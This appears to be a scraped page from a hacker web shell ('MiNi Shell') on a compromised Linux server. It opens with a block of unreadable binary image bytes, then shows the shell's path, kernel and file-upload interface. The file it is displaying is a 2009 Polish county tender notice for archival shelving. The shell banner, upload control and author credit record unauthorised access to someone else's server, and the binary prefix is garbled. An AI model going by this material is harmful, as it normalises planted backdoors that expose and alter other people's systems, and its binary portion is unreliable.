JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090826/140487-N-2009.html

<p class="kh_header"><b>Ryki: Zakup i montaż regałów archiwalnych w Starostwie Powiatowym w Rykach</b><br>
<b>Numer ogłoszenia: 140487 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Rycki , ul. Wyczółkowskiego 10A, 08-500 Ryki, woj. lubelskie, tel. 081 8657450, 8657472, faks 081 8651966.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiatryki.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i montaż regałów archiwalnych w Starostwie Powiatowym w Rykach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem regałów archiwalnych do archiwum Starostwa Powiatowego w Rykach oraz archiwum Wydziału Komunikacji.

Pomieszczenie Nr 1 - Archiwum Wydziału Komunikacji
1)	Regał jezdny dwustronny o wymiarach: wysokość całkowita 2100 mm, głębokość użytkowa 2 x 250 mm, długość użytkowa 4500 mm, długość półek 900 mm, światło miedzy półkami 210 mm, ilość półek w pionie: 8 półek użytkowych + 1 górna antykurzowa - 3 szt.
2)	Regał stacjonarny jednostronny o wymiarach: wysokość całkowita 2100 mm, głębokość użytkowa 1 x 250 mm, długość użytkowa 5400 mm, długość półek 900 mm, światło miedzy półkami 210 mm, ilość półek w pionie: 8 półek użytkowych + 1 górna antykurzowa - 1 szt.
3)	Szyny nawierzchniowe z najazdami obustronnymi o długości 2600 mm: 3 szt.

Pomieszczenie Nr 2 - Archiwum Wydziału Komunikacji
1)	Regał jezdny dwustronny o wymiarach: wysokość całkowita 2055 mm, głębokość użytkowa 2 x 300 mm, długość użytkowa 2400 mm, długość półek 1200 mm, światło miedzy półkami 345 mm, ilość półek w pionie: 5 półek użytkowych + 1 górna antykurzowa - 8 szt.
2)	Regał stacjonarny jednostronny o wymiarach: wysokość całkowita 2055 mm, głębokość użytkowa 1 x 300 mm, długość użytkowa 2400 mm, długość półek 1200 mm, światło miedzy półkami 345 mm, ilość półek w pionie: 5 półek użytkowych + 1 górna antykurzowa - 1 szt.
3)	Szyny nawierzchniowe z najazdami obustronnymi o długości 6200 mm: 2 szt.

Pomieszczenie Nr 3 - Archiwum Starostwa Powiatowego w Rykach
1)	Regał jezdny dwustronny o wymiarach: wysokość całkowita 2280 mm, głębokość użytkowa 2 x 370 mm, długość użytkowa 5800 mm, długość półek 1200 mm i 1000 mm, światło miedzy półkami 270 mm, ilość półek w pionie: 7 półek użytkowych + 1 górna antykurzowa - 6 szt.
2)	Szyny nawierzchniowe z najazdami obustronnymi od długości 5500 mm: 4 szt. 

Wymagania dodatkowe:
-	Regały i przody regałów osłonięte panelami ozdobnymi w kolorze standardowym RAL 7035 (jasno szarym),
-	Listwy opisowe na panelach ozdobnych,
-	Gumowa uszczelka zabezpieczająca przed kurzem przy każdym panelu przednim,
-	Pełne ściany boczne z perforacją,
-	Stężenia krzyżakowe, plecy tylne stalowe,
-	System blokujący regał w wybranym przez pracownika położeniu, umieszczony w korbie każdego regału, co gwarantuje bezpieczeństwo korzystania z systemu,
-	Regały muszą posiadać zamontowany w szynie antywyważnik zabezpieczający regał przed niekontrolowanym przechyłem,
-	Gumowe odbojniki pomiędzy regałami, zamontowane tak, aby regał dojeżdżając nie wywoływał silnych drgań i tym samym nie przesuwał dokumentów,
-	Półki standardowe o gr. 30 mm o zaokrąglonych krawędziach, malowane strukturą skórki pomarańczy aby dodatkowo utrudnić niekontrolowane przesuwanie się składowanych dokumentów,
-	Mocowanie półek na zaczepach co 15 mm,
-	Nośność półki przy równomiernym rozłożeniu 75 kg/1mb,
-	Napęd korbowy - korba trójramienna,
-	Napęd kół przez przekładnie łańcuchową, elementy ruchome osadzone na uszczelnionych łożyskach tocznych,
-	Układ jezdny regałów zamontowany na ramie sztywnej, co gwarantuje dużą stabilność elementów jednych oraz łatwość w przesuwaniu regałów,
-	Regały stacjonarne  także na ramie sztywnej aby zapewnić ich stabilność oraz zachować wysokość z regałami przesuwnymi,
-	Regały wykonane z jakościowej stali, malowane proszkowo farbą epoksydową, przyjazną dla środowiska. Powłoka lakiernicza musi być odporna na ścieranie oraz zadrapania.
-	Konstrukcja regałów i sposób ich działania musi zapewniać pełne bezpieczeństwo użytkownikowi systemu. 


Uwagi dotyczące przedmiotu zamówienia:
Zaleca się wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 1.000,00 zł (słownie: jeden tysiąc złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy:
a. nie podlegają wykluczeniu z przedmiotowego postępowania na podstawie art. 24 ust. 1 i 2 ustawy;
b. spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
c. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Uwaga: Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń wymienionych
w pkt. 7 siwz będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający ustali na podstawie treści tych dokumentów i oświadczeń czy wykonawca spełnia wszystkie wyżej wymienione warunki, stosując zasadę: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie o niepodleganiu wykluczeniu z przedmiotowego postępowania na podstawie art. 24 ust. 1 w związku z art. 22 ust. 1 pkt 4 ustawy - zał. Nr 2 do SIWZ
2.	Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 pkt 1-3 ustawy - według wzoru określonego w załączniku Nr 3 do SIWZ.
3.	Dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
4.	Wykaz zamówień - według wzoru stanowiącego załączniki Nr 4 do SIWZ. Wykaz wykonanych robót w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te roboty zostały wykonane należycie. Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże co najmniej jedną robotę o zbliżonym charakterze i wielkości do określonej zamówieniem związaną z zakupem i montażem regałów archiwalnych o wartości nie mniejszej niż 50.000,00 zł brutto..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.powiatryki.bip.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rykach, ul. Wyczółkowskiego 10 A, pokój nr 214.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2009 godzina 12:00, miejsce: Starostwo Powiatowe w Rykach, ul. Wyczółkowskiego 10 A, pokój nr 103.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com